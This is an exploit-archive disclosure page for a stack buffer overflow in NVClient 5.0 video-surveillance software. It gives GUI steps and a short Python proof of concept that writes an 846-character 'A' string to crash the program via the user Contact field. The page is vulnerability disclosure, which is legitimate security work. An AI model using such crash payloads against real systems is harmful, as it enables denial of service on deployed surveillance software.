NVClient 5.0 Stack Buffer Overflow

2023.09.04
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 2023-08-19 # Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar # Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf # Vulnerability Type: Buffer Overflow Local # Tested On: Windows 10 64bit # Tested Version: 5.0 # Steps to Reproduce: # 1- Run the python script and create exploit.txt file # 2- Open the application and log in # 3- Click the "Config" button in the upper menu # 4- Click the "User" button just below it # 5- Now click the "Add users" button in the lower left # 6- Fill in the Username, Password, and Confirm boxes # 7- Paste the characters from exploit.txt into the Contact box # 8- Click OK and crash! #!/usr/bin/env python3 exploit = 'A' * 846 try: with open("exploit.txt","w") as file: file.write(exploit) print("POC is created") except: print("POC not created")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top